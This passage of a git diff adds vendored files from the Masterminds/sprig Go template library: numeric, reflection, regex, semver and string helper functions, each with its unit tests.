+ case reflect.Uint, reflect.Uint64:
+ return float64(val.Uint())
+ case reflect.Float32, reflect.Float64:
+ return val.Float()
+ case reflect.Bool:
+ if val.Bool() == true {
+ return 1
+ }
+ return 0
+ default:
+ return 0
+ }
+}
+
+func toInt(v interface{}) int {
	// It's not optimal, but it avoids duplicating the toInt64 code.
+ return int(toInt64(v))
+}
+
+// toInt64 converts integer types to 64-bit integers
+func toInt64(v interface{}) int64 {
+ if str, ok := v.(string); ok {
+ iv, err := strconv.ParseInt(str, 10, 64)
+ if err != nil {
+ return 0
+ }
+ return iv
+ }
+
+ val := reflect.Indirect(reflect.ValueOf(v))
+ switch val.Kind() {
+ case reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64, reflect.Int:
+ return val.Int()
+ case reflect.Uint8, reflect.Uint16, reflect.Uint32:
+ return int64(val.Uint())
+ case reflect.Uint, reflect.Uint64:
+ tv := val.Uint()
+ if tv <= math.MaxInt64 {
+ return int64(tv)
+ }
+ // TODO: What is the sensible thing to do here?
+ return math.MaxInt64
+ case reflect.Float32, reflect.Float64:
+ return int64(val.Float())
+ case reflect.Bool:
+ if val.Bool() == true {
+ return 1
+ }
+ return 0
+ default:
+ return 0
+ }
+}
+
+func max(a interface{}, i ...interface{}) int64 {
+ aa := toInt64(a)
+ for _, b := range i {
+ bb := toInt64(b)
+ if bb > aa {
+ aa = bb
+ }
+ }
+ return aa
+}
+
+func min(a interface{}, i ...interface{}) int64 {
+ aa := toInt64(a)
+ for _, b := range i {
+ bb := toInt64(b)
+ if bb < aa {
+ aa = bb
+ }
+ }
+ return aa
+}
+
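+// until returns a []int counting from 0 toward count (exclusive), stepping
+// by +1 or -1 depending on the sign of count, e.g. until(5) => [0 1 2 3 4].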
+func until(count int) []int {
+ step := 1
+ if count < 0 {
+ step = -1
+ }
+ return untilStep(0, count, step)
+}
+
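+// untilStep returns the integers from start toward stop (exclusive) in
+// increments of step. It returns an empty slice when the sign of step
+// cannot move start toward stop (e.g. a non-negative step with stop < start).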
+func untilStep(start, stop, step int) []int {
+ v := []int{}
+
+ if stop < start {
+ if step >= 0 {
+ return v
+ }
+ for i := start; i > stop; i += step {
+ v = append(v, i)
+ }
+ return v
+ }
+
+ if step <= 0 {
+ return v
+ }
+ for i := start; i < stop; i += step {
+ v = append(v, i)
+ }
+ return v
+}
+
+func floor(a interface{}) float64 {
+ aa := toFloat64(a)
+ return math.Floor(aa)
+}
+
+func ceil(a interface{}) float64 {
+ aa := toFloat64(a)
+ return math.Ceil(aa)
+}
+
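+// round rounds a to p decimal places by scaling it by 10^p, rounding, and
+// scaling back. The optional r_opt overrides the rounding midpoint (default
+// .5): fractional parts >= the midpoint round up, the rest round down, e.g.
+// round(123.5555, 3) => 123.556 and round(123.233, 2, .3) => 123.24.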
+func round(a interface{}, p int, r_opt ...float64) float64 {
+ roundOn := .5
+ if len(r_opt) > 0 {
+ roundOn = r_opt[0]
+ }
+ val := toFloat64(a)
+ places := toFloat64(p)
+
+ var round float64
+ pow := math.Pow(10, places)
+ digit := pow * val
+ _, div := math.Modf(digit)
+ if div >= roundOn {
+ round = math.Ceil(digit)
+ } else {
+ round = math.Floor(digit)
+ }
+ return round / pow
+}
\ No newline at end of file
diff --git a/vendor/github.com/Masterminds/sprig/numeric_test.go b/vendor/github.com/Masterminds/sprig/numeric_test.go
new file mode 100644
index 0000000000..2f41253052
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/numeric_test.go
@@ -0,0 +1,205 @@
+package sprig
+
+import (
+ "testing"
+
+ "github.com/stretchr/testify/assert"
+)
+
+func TestUntil(t *testing.T) {
+ tests := map[string]string{
+ `{{range $i, $e := until 5}}{{$i}}{{$e}}{{end}}`: "0011223344",
+ `{{range $i, $e := until -5}}{{$i}}{{$e}} {{end}}`: "00 1-1 2-2 3-3 4-4 ",
+ }
+ for tpl, expect := range tests {
+ if err := runt(tpl, expect); err != nil {
+ t.Error(err)
+ }
+ }
+}
+func TestUntilStep(t *testing.T) {
+ tests := map[string]string{
+ `{{range $i, $e := untilStep 0 5 1}}{{$i}}{{$e}}{{end}}`: "0011223344",
+ `{{range $i, $e := untilStep 3 6 1}}{{$i}}{{$e}}{{end}}`: "031425",
+ `{{range $i, $e := untilStep 0 -10 -2}}{{$i}}{{$e}} {{end}}`: "00 1-2 2-4 3-6 4-8 ",
+ `{{range $i, $e := untilStep 3 0 1}}{{$i}}{{$e}}{{end}}`: "",
+ `{{range $i, $e := untilStep 3 99 0}}{{$i}}{{$e}}{{end}}`: "",
+ `{{range $i, $e := untilStep 3 99 -1}}{{$i}}{{$e}}{{end}}`: "",
+ `{{range $i, $e := untilStep 3 0 0}}{{$i}}{{$e}}{{end}}`: "",
+ }
+ for tpl, expect := range tests {
+ if err := runt(tpl, expect); err != nil {
+ t.Error(err)
+ }
+ }
+
+}
+func TestBiggest(t *testing.T) {
+ tpl := `{{ biggest 1 2 3 345 5 6 7}}`
+ if err := runt(tpl, `345`); err != nil {
+ t.Error(err)
+ }
+
+ tpl = `{{ max 345}}`
+ if err := runt(tpl, `345`); err != nil {
+ t.Error(err)
+ }
+}
+func TestMin(t *testing.T) {
+ tpl := `{{ min 1 2 3 345 5 6 7}}`
+ if err := runt(tpl, `1`); err != nil {
+ t.Error(err)
+ }
+
+ tpl = `{{ min 345}}`
+ if err := runt(tpl, `345`); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestToFloat64(t *testing.T) {
+ target := float64(102)
+ if target != toFloat64(int8(102)) {
+ t.Errorf("Expected 102")
+ }
+ if target != toFloat64(int(102)) {
+ t.Errorf("Expected 102")
+ }
+ if target != toFloat64(int32(102)) {
+ t.Errorf("Expected 102")
+ }
+ if target != toFloat64(int16(102)) {
+ t.Errorf("Expected 102")
+ }
+ if target != toFloat64(int64(102)) {
+ t.Errorf("Expected 102")
+ }
+ if target != toFloat64("102") {
+ t.Errorf("Expected 102")
+ }
+ if 0 != toFloat64("frankie") {
+ t.Errorf("Expected 0")
+ }
+ if target != toFloat64(uint16(102)) {
+ t.Errorf("Expected 102")
+ }
+ if target != toFloat64(uint64(102)) {
+ t.Errorf("Expected 102")
+ }
+ if 102.1234 != toFloat64(float64(102.1234)) {
+ t.Errorf("Expected 102.1234")
+ }
+ if 1 != toFloat64(true) {
+ t.Errorf("Expected 102")
+ }
+}
+func TestToInt64(t *testing.T) {
+ target := int64(102)
+ if target != toInt64(int8(102)) {
+ t.Errorf("Expected 102")
+ }
+ if target != toInt64(int(102)) {
+ t.Errorf("Expected 102")
+ }
+ if target != toInt64(int32(102)) {
+ t.Errorf("Expected 102")
+ }
+ if target != toInt64(int16(102)) {
+ t.Errorf("Expected 102")
+ }
+ if target != toInt64(int64(102)) {
+ t.Errorf("Expected 102")
+ }
+ if target != toInt64("102") {
+ t.Errorf("Expected 102")
+ }
+ if 0 != toInt64("frankie") {
+ t.Errorf("Expected 0")
+ }
+ if target != toInt64(uint16(102)) {
+ t.Errorf("Expected 102")
+ }
+ if target != toInt64(uint64(102)) {
+ t.Errorf("Expected 102")
+ }
+ if target != toInt64(float64(102.1234)) {
+ t.Errorf("Expected 102")
+ }
+ if 1 != toInt64(true) {
+ t.Errorf("Expected 102")
+ }
+}
+
+func TestToInt(t *testing.T) {
+ target := int(102)
+ if target != toInt(int8(102)) {
+ t.Errorf("Expected 102")
+ }
+ if target != toInt(int(102)) {
+ t.Errorf("Expected 102")
+ }
+ if target != toInt(int32(102)) {
+ t.Errorf("Expected 102")
+ }
+ if target != toInt(int16(102)) {
+ t.Errorf("Expected 102")
+ }
+ if target != toInt(int64(102)) {
+ t.Errorf("Expected 102")
+ }
+ if target != toInt("102") {
+ t.Errorf("Expected 102")
+ }
+ if 0 != toInt("frankie") {
+ t.Errorf("Expected 0")
+ }
+ if target != toInt(uint16(102)) {
+ t.Errorf("Expected 102")
+ }
+ if target != toInt(uint64(102)) {
+ t.Errorf("Expected 102")
+ }
+ if target != toInt(float64(102.1234)) {
+ t.Errorf("Expected 102")
+ }
+ if 1 != toInt(true) {
+ t.Errorf("Expected 102")
+ }
+}
+
+func TestAdd(t *testing.T) {
+ tpl := `{{ 3 | add 1 2}}`
+ if err := runt(tpl, `6`); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestMul(t *testing.T) {
+ tpl := `{{ 1 | mul "2" 3 "4"}}`
+ if err := runt(tpl, `24`); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestCeil(t *testing.T) {
+ assert.Equal(t, 123.0, ceil(123))
+ assert.Equal(t, 123.0, ceil("123"))
+ assert.Equal(t, 124.0, ceil(123.01))
+ assert.Equal(t, 124.0, ceil("123.01"))
+}
+
+func TestFloor(t *testing.T) {
+ assert.Equal(t, 123.0, floor(123))
+ assert.Equal(t, 123.0, floor("123"))
+ assert.Equal(t, 123.0, floor(123.9999))
+ assert.Equal(t, 123.0, floor("123.9999"))
+}
+
+func TestRound(t *testing.T) {
+ assert.Equal(t, 123.556, round(123.5555, 3))
+ assert.Equal(t, 123.556, round("123.55555", 3))
+ assert.Equal(t, 124.0, round(123.500001, 0))
+ assert.Equal(t, 123.0, round(123.49999999, 0))
+ assert.Equal(t, 123.23, round(123.2329999, 2, .3))
+ assert.Equal(t, 123.24, round(123.233, 2, .3))
+}
diff --git a/vendor/github.com/Masterminds/sprig/reflect.go b/vendor/github.com/Masterminds/sprig/reflect.go
new file mode 100644
index 0000000000..8a65c132f0
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/reflect.go
@@ -0,0 +1,28 @@
+package sprig
+
+import (
+ "fmt"
+ "reflect"
+)
+
+// typeIs returns true if the src is the type named in target.
+func typeIs(target string, src interface{}) bool {
+ return target == typeOf(src)
+}
+
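+// typeIsLike returns true if src's type matches target directly or as a
+// pointer ("*" + target).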
+func typeIsLike(target string, src interface{}) bool {
+ t := typeOf(src)
+ return target == t || "*"+target == t
+}
+
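+// typeOf returns src's Go type as a string, e.g. "*sprig.fixtureTO".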
+func typeOf(src interface{}) string {
+ return fmt.Sprintf("%T", src)
+}
+
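+// kindIs returns true if src's reflect.Kind matches target.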
+func kindIs(target string, src interface{}) bool {
+ return target == kindOf(src)
+}
+
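+// kindOf returns src's reflect.Kind as a string, e.g. "ptr" or "slice".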
+func kindOf(src interface{}) string {
+ return reflect.ValueOf(src).Kind().String()
+}
diff --git a/vendor/github.com/Masterminds/sprig/reflect_test.go b/vendor/github.com/Masterminds/sprig/reflect_test.go
new file mode 100644
index 0000000000..515fae9c4f
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/reflect_test.go
@@ -0,0 +1,73 @@
+package sprig
+
+import (
+ "testing"
+)
+
+type fixtureTO struct {
+ Name, Value string
+}
+
+func TestTypeOf(t *testing.T) {
+ f := &fixtureTO{"hello", "world"}
+ tpl := `{{typeOf .}}`
+ if err := runtv(tpl, "*sprig.fixtureTO", f); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestKindOf(t *testing.T) {
+ tpl := `{{kindOf .}}`
+
+ f := fixtureTO{"hello", "world"}
+ if err := runtv(tpl, "struct", f); err != nil {
+ t.Error(err)
+ }
+
+ f2 := []string{"hello"}
+ if err := runtv(tpl, "slice", f2); err != nil {
+ t.Error(err)
+ }
+
+ var f3 *fixtureTO = nil
+ if err := runtv(tpl, "ptr", f3); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestTypeIs(t *testing.T) {
+ f := &fixtureTO{"hello", "world"}
+ tpl := `{{if typeIs "*sprig.fixtureTO" .}}t{{else}}f{{end}}`
+ if err := runtv(tpl, "t", f); err != nil {
+ t.Error(err)
+ }
+
+ f2 := "hello"
+ if err := runtv(tpl, "f", f2); err != nil {
+ t.Error(err)
+ }
+}
+func TestTypeIsLike(t *testing.T) {
+ f := "foo"
+ tpl := `{{if typeIsLike "string" .}}t{{else}}f{{end}}`
+ if err := runtv(tpl, "t", f); err != nil {
+ t.Error(err)
+ }
+
+ // Now make a pointer. Should still match.
+ f2 := &f
+ if err := runtv(tpl, "t", f2); err != nil {
+ t.Error(err)
+ }
+}
+func TestKindIs(t *testing.T) {
+ f := &fixtureTO{"hello", "world"}
+ tpl := `{{if kindIs "ptr" .}}t{{else}}f{{end}}`
+ if err := runtv(tpl, "t", f); err != nil {
+ t.Error(err)
+ }
+ f2 := "hello"
+ if err := runtv(tpl, "f", f2); err != nil {
+ t.Error(err)
+ }
+}
diff --git a/vendor/github.com/Masterminds/sprig/regex.go b/vendor/github.com/Masterminds/sprig/regex.go
new file mode 100644
index 0000000000..9fe033a6bd
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/regex.go
@@ -0,0 +1,35 @@
+package sprig
+
+import (
+ "regexp"
+)
+
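+// regexMatch reports whether s contains a match for regex; compile errors
+// are swallowed, so an invalid pattern simply returns false.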
+func regexMatch(regex string, s string) bool {
+ match, _ := regexp.MatchString(regex, s)
+ return match
+}
+
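+// The helpers below use MustCompile, so an invalid pattern panics inside
+// the template engine rather than returning an error.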
+func regexFindAll(regex string, s string, n int) []string {
+ r := regexp.MustCompile(regex)
+ return r.FindAllString(s, n)
+}
+
+func regexFind(regex string, s string) string {
+ r := regexp.MustCompile(regex)
+ return r.FindString(s)
+}
+
+func regexReplaceAll(regex string, s string, repl string) string {
+ r := regexp.MustCompile(regex)
+ return r.ReplaceAllString(s, repl)
+}
+
+func regexReplaceAllLiteral(regex string, s string, repl string) string {
+ r := regexp.MustCompile(regex)
+ return r.ReplaceAllLiteralString(s, repl)
+}
+
+func regexSplit(regex string, s string, n int) []string {
+ r := regexp.MustCompile(regex)
+ return r.Split(s, n)
+}
\ No newline at end of file
diff --git a/vendor/github.com/Masterminds/sprig/regex_test.go b/vendor/github.com/Masterminds/sprig/regex_test.go
new file mode 100644
index 0000000000..ccb87fe2f5
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/regex_test.go
@@ -0,0 +1,61 @@
+package sprig
+
+import (
+ "testing"
+
+ "github.com/stretchr/testify/assert"
+)
+
+func TestRegexMatch(t *testing.T) {
+ regex := "[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\\.[A-Za-z]{2,}"
+
+ assert.True(t, regexMatch(regex, "test@acme.com"))
+ assert.True(t, regexMatch(regex, "Test@Acme.Com"))
+ assert.False(t, regexMatch(regex, "test"))
+ assert.False(t, regexMatch(regex, "test.com"))
+ assert.False(t, regexMatch(regex, "test@acme"))
+}
+
+func TestRegexFindAll(t *testing.T) {
+ regex := "a{2}"
+ assert.Equal(t, 1, len(regexFindAll(regex, "aa", -1)))
+ assert.Equal(t, 1, len(regexFindAll(regex, "aaaaaaaa", 1)))
+ assert.Equal(t, 2, len(regexFindAll(regex, "aaaa", -1)))
+ assert.Equal(t, 0, len(regexFindAll(regex, "none", -1)))
+}
+
+func TestRegexFind(t *testing.T) {
+ regex := "fo.?"
+ assert.Equal(t, "foo", regexFind(regex, "foorbar"))
+ assert.Equal(t, "foo", regexFind(regex, "foo foe fome"))
+ assert.Equal(t, "", regexFind(regex, "none"))
+}
+
+func TestRegexReplaceAll(t *testing.T) {
+ regex := "a(x*)b"
+ assert.Equal(t, "-T-T-", regexReplaceAll(regex, "-ab-axxb-", "T"))
+ assert.Equal(t, "--xx-", regexReplaceAll(regex, "-ab-axxb-", "$1"))
+ assert.Equal(t, "---", regexReplaceAll(regex, "-ab-axxb-", "$1W"))
+ assert.Equal(t, "-W-xxW-", regexReplaceAll(regex, "-ab-axxb-", "${1}W"))
+}
+
+func TestRegexReplaceAllLiteral(t *testing.T) {
+ regex := "a(x*)b"
+ assert.Equal(t, "-T-T-", regexReplaceAllLiteral(regex, "-ab-axxb-", "T"))
+ assert.Equal(t, "-$1-$1-", regexReplaceAllLiteral(regex, "-ab-axxb-", "$1"))
+ assert.Equal(t, "-${1}-${1}-", regexReplaceAllLiteral(regex, "-ab-axxb-", "${1}"))
+}
+
+func TestRegexSplit(t *testing.T) {
+ regex := "a"
+ assert.Equal(t, 4, len(regexSplit(regex, "banana", -1)))
+ assert.Equal(t, 0, len(regexSplit(regex, "banana", 0)))
+ assert.Equal(t, 1, len(regexSplit(regex, "banana", 1)))
+ assert.Equal(t, 2, len(regexSplit(regex, "banana", 2)))
+
+ regex = "z+"
+ assert.Equal(t, 2, len(regexSplit(regex, "pizza", -1)))
+ assert.Equal(t, 0, len(regexSplit(regex, "pizza", 0)))
+ assert.Equal(t, 1, len(regexSplit(regex, "pizza", 1)))
+ assert.Equal(t, 2, len(regexSplit(regex, "pizza", 2)))
+}
\ No newline at end of file
diff --git a/vendor/github.com/Masterminds/sprig/semver.go b/vendor/github.com/Masterminds/sprig/semver.go
new file mode 100644
index 0000000000..c2bf8a1fdf
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/semver.go
@@ -0,0 +1,23 @@
+package sprig
+
+import (
+ sv2 "github.com/Masterminds/semver"
+)
+
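+// semverCompare reports whether version satisfies constraint, e.g.
+// semverCompare("^1.2.0", "1.2.3") => (true, nil).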
+func semverCompare(constraint, version string) (bool, error) {
+ c, err := sv2.NewConstraint(constraint)
+ if err != nil {
+ return false, err
+ }
+
+ v, err := sv2.NewVersion(version)
+ if err != nil {
+ return false, err
+ }
+
+ return c.Check(v), nil
+}
+
+func semver(version string) (*sv2.Version, error) {
+ return sv2.NewVersion(version)
+}
diff --git a/vendor/github.com/Masterminds/sprig/semver_test.go b/vendor/github.com/Masterminds/sprig/semver_test.go
new file mode 100644
index 0000000000..53d3c8be9b
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/semver_test.go
@@ -0,0 +1,31 @@
+package sprig
+
+import (
+ "testing"
+
+ "github.com/stretchr/testify/assert"
+)
+
+func TestSemverCompare(t *testing.T) {
+ tests := map[string]string{
+ `{{ semverCompare "1.2.3" "1.2.3" }}`: `true`,
+ `{{ semverCompare "^1.2.0" "1.2.3" }}`: `true`,
+ `{{ semverCompare "^1.2.0" "2.2.3" }}`: `false`,
+ }
+ for tpl, expect := range tests {
+ assert.NoError(t, runt(tpl, expect))
+ }
+}
+
+func TestSemver(t *testing.T) {
+ tests := map[string]string{
+ `{{ $s := semver "1.2.3-beta.1+c0ff33" }}{{ $s.Prerelease }}`: "beta.1",
+ `{{ $s := semver "1.2.3-beta.1+c0ff33" }}{{ $s.Major }}`: "1",
+ `{{ semver "1.2.3" | (semver "1.2.3").Compare }}`: `0`,
+ `{{ semver "1.2.3" | (semver "1.3.3").Compare }}`: `1`,
+ `{{ semver "1.4.3" | (semver "1.2.3").Compare }}`: `-1`,
+ }
+ for tpl, expect := range tests {
+ assert.NoError(t, runt(tpl, expect))
+ }
+}
diff --git a/vendor/github.com/Masterminds/sprig/strings.go b/vendor/github.com/Masterminds/sprig/strings.go
new file mode 100644
index 0000000000..f6afa2ff9e
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/strings.go
@@ -0,0 +1,201 @@
+package sprig
+
+import (
+ "encoding/base32"
+ "encoding/base64"
+ "fmt"
+ "reflect"
+ "strconv"
+ "strings"
+
+ util "github.com/aokoli/goutils"
+)
+
+func base64encode(v string) string {
+ return base64.StdEncoding.EncodeToString([]byte(v))
+}
+
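+// base64decode decodes v; on malformed input the error text itself is
+// returned as the template output.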
+func base64decode(v string) string {
+ data, err := base64.StdEncoding.DecodeString(v)
+ if err != nil {
+ return err.Error()
+ }
+ return string(data)
+}
+
+func base32encode(v string) string {
+ return base32.StdEncoding.EncodeToString([]byte(v))
+}
+
+func base32decode(v string) string {
+ data, err := base32.StdEncoding.DecodeString(v)
+ if err != nil {
+ return err.Error()
+ }
+ return string(data)
+}
+
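+// abbrev shortens s to width characters with a trailing ellipsis; widths
+// below 4 (too small to abbreviate) return s unchanged.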
+func abbrev(width int, s string) string {
+ if width < 4 {
+ return s
+ }
+ r, _ := util.Abbreviate(s, width)
+ return r
+}
+
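+// abbrevboth abbreviates both ends of s; parameter combinations that
+// AbbreviateFull would reject return s unchanged.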
+func abbrevboth(left, right int, s string) string {
+ if right < 4 || left > 0 && right < 7 {
+ return s
+ }
+ r, _ := util.AbbreviateFull(s, left, right)
+ return r
+}
+
+func initials(s string) string {
+ // Wrap this just to eliminate the var args, which templates don't do well.
+ return util.Initials(s)
+}
+
+func randAlphaNumeric(count int) string {
+ // It is not possible, it appears, to actually generate an error here.
+ r, _ := util.RandomAlphaNumeric(count)
+ return r
+}
+
+func randAlpha(count int) string {
+ r, _ := util.RandomAlphabetic(count)
+ return r
+}
+
+func randAscii(count int) string {
+ r, _ := util.RandomAscii(count)
+ return r
+}
+
+func randNumeric(count int) string {
+ r, _ := util.RandomNumeric(count)
+ return r
+}
+
+func untitle(str string) string {
+ return util.Uncapitalize(str)
+}
+
+func quote(str ...interface{}) string {
+ out := make([]string, len(str))
+ for i, s := range str {
+ out[i] = fmt.Sprintf("%q", strval(s))
+ }
+ return strings.Join(out, " ")
+}
+
+func squote(str ...interface{}) string {
+ out := make([]string, len(str))
+ for i, s := range str {
+ out[i] = fmt.Sprintf("'%v'", s)
+ }
+ return strings.Join(out, " ")
+}
+
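+// cat joins the string forms of its arguments with single spaces, e.g.
+// cat "a" "b" 1 => "a b 1".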
+func cat(v ...interface{}) string {
+ r := strings.TrimSpace(strings.Repeat("%v ", len(v)))
+ return fmt.Sprintf(r, v...)
+}
+
+func indent(spaces int, v string) string {
+ pad := strings.Repeat(" ", spaces)
+ return pad + strings.Replace(v, "\n", "\n"+pad, -1)
+}
+
+func nindent(spaces int, v string) string {
+ return "\n" + indent(spaces, v)
+}
+
+func replace(old, new, src string) string {
+ return strings.Replace(src, old, new, -1)
+}
+
+func plural(one, many string, count int) string {
+ if count == 1 {
+ return one
+ }
+ return many
+}
+
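+// strslice coerces v into a []string: string slices pass through, other
+// slices and arrays are converted element-wise via strval, and scalars
+// become a one-element slice.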
+func strslice(v interface{}) []string {
+ switch v := v.(type) {
+ case []string:
+ return v
+ case []interface{}:
+ l := len(v)
+ b := make([]string, l)
+ for i := 0; i < l; i++ {
+ b[i] = strval(v[i])
+ }
+ return b
+ default:
+ val := reflect.ValueOf(v)
+ switch val.Kind() {
+ case reflect.Array, reflect.Slice:
+ l := val.Len()
+ b := make([]string, l)
+ for i := 0; i < l; i++ {
+ b[i] = strval(val.Index(i).Interface())
+ }
+ return b
+ default:
+ return []string{strval(v)}
+ }
+ }
+}
+
+func strval(v interface{}) string {
+ switch v := v.(type) {
+ case string:
+ return v
+ case []byte:
+ return string(v)
+ case error:
+ return v.Error()
+ case fmt.Stringer:
+ return v.String()
+ default:
+ return fmt.Sprintf("%v", v)
+ }
+}
+
+func trunc(c int, s string) string {
+ if len(s) <= c {
+ return s
+ }
+ return s[0:c]
+}
+
+func join(sep string, v interface{}) string {
+ return strings.Join(strslice(v), sep)
+}
+
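+// split breaks orig around sep and returns the parts as a map keyed "_0",
+// "_1", ..., so templates can address them, e.g. {{$v._0}}.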
+func split(sep, orig string) map[string]string {
+ parts := strings.Split(orig, sep)
+ res := make(map[string]string, len(parts))
+ for i, v := range parts {
+ res["_"+strconv.Itoa(i)] = v
+ }
+ return res
+}
+
+// substring creates a substring of the given string.
+//
+// If start is < 0, this calls string[:length].
+//
+// If start is >= 0 and length < 0, this calls string[start:]
+//
+// Otherwise, this calls string[start:length].
+func substring(start, length int, s string) string {
+ if start < 0 {
+ return s[:length]
+ }
+ if length < 0 {
+ return s[start:]
+ }
+ return s[start:length]
+}
diff --git a/vendor/github.com/Masterminds/sprig/strings_test.go b/vendor/github.com/Masterminds/sprig/strings_test.go
new file mode 100644
index 0000000000..79bfcf5483
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/strings_test.go
@@ -0,0 +1,227 @@
+package sprig
+
+import (
+ "encoding/base32"
+ "encoding/base64"
+ "fmt"
+ "math/rand"
+ "testing"
+
+ "github.com/aokoli/goutils"
+ "github.com/stretchr/testify/assert"
+)
+
+func TestSubstr(t *testing.T) {
+ tpl := `{{"fooo" | substr 0 3 }}`
+ if err := runt(tpl, "foo"); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestTrunc(t *testing.T) {
+ tpl := `{{ "foooooo" | trunc 3 }}`
+ if err := runt(tpl, "foo"); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestQuote(t *testing.T) {
+ tpl := `{{quote "a" "b" "c"}}`
+ if err := runt(tpl, `"a" "b" "c"`); err != nil {
+ t.Error(err)
+ }
+ tpl = `{{quote "\"a\"" "b" "c"}}`
+ if err := runt(tpl, `"\"a\"" "b" "c"`); err != nil {
+ t.Error(err)
+ }
+ tpl = `{{quote 1 2 3 }}`
+ if err := runt(tpl, `"1" "2" "3"`); err != nil {
+ t.Error(err)
+ }
+}
+func TestSquote(t *testing.T) {
+ tpl := `{{squote "a" "b" "c"}}`
+ if err := runt(tpl, `'a' 'b' 'c'`); err != nil {
+ t.Error(err)
+ }
+ tpl = `{{squote 1 2 3 }}`
+ if err := runt(tpl, `'1' '2' '3'`); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestContains(t *testing.T) {
+ // Mainly, we're just verifying the parameter order swap.
+ tests := []string{
+ `{{if contains "cat" "fair catch"}}1{{end}}`,
+ `{{if hasPrefix "cat" "catch"}}1{{end}}`,
+ `{{if hasSuffix "cat" "ducat"}}1{{end}}`,
+ }
+ for _, tt := range tests {
+ if err := runt(tt, "1"); err != nil {
+ t.Error(err)
+ }
+ }
+}
+
+func TestTrim(t *testing.T) {
+ tests := []string{
+ `{{trim " 5.00 "}}`,
+ `{{trimAll "$" "$5.00$"}}`,
+ `{{trimPrefix "$" "$5.00"}}`,
+ `{{trimSuffix "$" "5.00$"}}`,
+ }
+ for _, tt := range tests {
+ if err := runt(tt, "5.00"); err != nil {
+ t.Error(err)
+ }
+ }
+}
+
+func TestSplit(t *testing.T) {
+ tpl := `{{$v := "foo$bar$baz" | split "$"}}{{$v._0}}`
+ if err := runt(tpl, "foo"); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestToString(t *testing.T) {
+ tpl := `{{ toString 1 | kindOf }}`
+ assert.NoError(t, runt(tpl, "string"))
+}
+
+func TestToStrings(t *testing.T) {
+ tpl := `{{ $s := list 1 2 3 | toStrings }}{{ index $s 1 | kindOf }}`
+ assert.NoError(t, runt(tpl, "string"))
+}
+
+func TestJoin(t *testing.T) {
+ assert.NoError(t, runt(`{{ tuple "a" "b" "c" | join "-" }}`, "a-b-c"))
+ assert.NoError(t, runt(`{{ tuple 1 2 3 | join "-" }}`, "1-2-3"))
+ assert.NoError(t, runtv(`{{ join "-" .V }}`, "a-b-c", map[string]interface{}{"V": []string{"a", "b", "c"}}))
+ assert.NoError(t, runtv(`{{ join "-" .V }}`, "abc", map[string]interface{}{"V": "abc"}))
+ assert.NoError(t, runtv(`{{ join "-" .V }}`, "1-2-3", map[string]interface{}{"V": []int{1, 2, 3}}))
+}
+
+func TestSortAlpha(t *testing.T) {
+ // Named `append` in the function map
+ tests := map[string]string{
+ `{{ list "c" "a" "b" | sortAlpha | join "" }}`: "abc",
+ `{{ list 2 1 4 3 | sortAlpha | join "" }}`: "1234",
+ }
+ for tpl, expect := range tests {
+ assert.NoError(t, runt(tpl, expect))
+ }
+}
+func TestBase64EncodeDecode(t *testing.T) {
+ magicWord := "coffee"
+ expect := base64.StdEncoding.EncodeToString([]byte(magicWord))
+
+ if expect == magicWord {
+ t.Fatal("Encoder doesn't work.")
+ }
+
+ tpl := `{{b64enc "coffee"}}`
+ if err := runt(tpl, expect); err != nil {
+ t.Error(err)
+ }
+ tpl = fmt.Sprintf("{{b64dec %q}}", expect)
+ if err := runt(tpl, magicWord); err != nil {
+ t.Error(err)
+ }
+}
+func TestBase32EncodeDecode(t *testing.T) {
+ magicWord := "coffee"
+ expect := base32.StdEncoding.EncodeToString([]byte(magicWord))
+
+ if expect == magicWord {
+ t.Fatal("Encoder doesn't work.")
+ }
+
+ tpl := `{{b32enc "coffee"}}`
+ if err := runt(tpl, expect); err != nil {
+ t.Error(err)
+ }
+ tpl = fmt.Sprintf("{{b32dec %q}}", expect)
+ if err := runt(tpl, magicWord); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestGoutils(t *testing.T) {
+ tests := map[string]string{
+ `{{abbrev 5 "hello world"}}`: "he...",
+ `{{abbrevboth 5 10 "1234 5678 9123"}}`: "...5678...",
+ `{{nospace "h e l l o "}}`: "hello",
+ `{{untitle "First Try"}}`: "first try", //https://youtu.be/44-RsrF_V_w
+ `{{initials "First Try"}}`: "FT",
+ `{{wrap 5 "Hello World"}}`: "Hello\nWorld",
+ `{{wrapWith 5 "\t" "Hello World"}}`: "Hello\tWorld",
+ }
+ for k, v := range tests {
+ t.Log(k)
+ if err := runt(k, v); err != nil {
+ t.Errorf("Error on tpl %q: %s", k, err)
+ }
+ }
+}
+
+func TestRandom(t *testing.T) {
+ // One of the things I love about Go:
+ goutils.RANDOM = rand.New(rand.NewSource(1))
+
+ // Because we're using a random number generator, we need these to go in
+ // a predictable sequence:
+ if err := runt(`{{randAlphaNum 5}}`, "9bzRv"); err != nil {
+ t.Errorf("Error on tpl: %s", err)
+ }
+ if err := runt(`{{randAlpha 5}}`, "VjwGe"); err != nil {
+ t.Errorf("Error on tpl: %s", err)
+ }
+ if err := runt(`{{randAscii 5}}`, "1KA5p"); err != nil {
+ t.Errorf("Error on tpl: %s", err)
+ }
+ if err := runt(`{{randNumeric 5}}`, "26018"); err != nil {
+ t.Errorf("Error on tpl: %s", err)
+ }
+
+}
+
+func TestCat(t *testing.T) {
+ tpl := `{{$b := "b"}}{{"c" | cat "a" $b}}`
+ if err := runt(tpl, "a b c"); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestIndent(t *testing.T) {
+ tpl := `{{indent 4 "a\nb\nc"}}`
+ if err := runt(tpl, " a\n b\n c"); err != nil {
+ t.Error(err)
+ }
+}
+
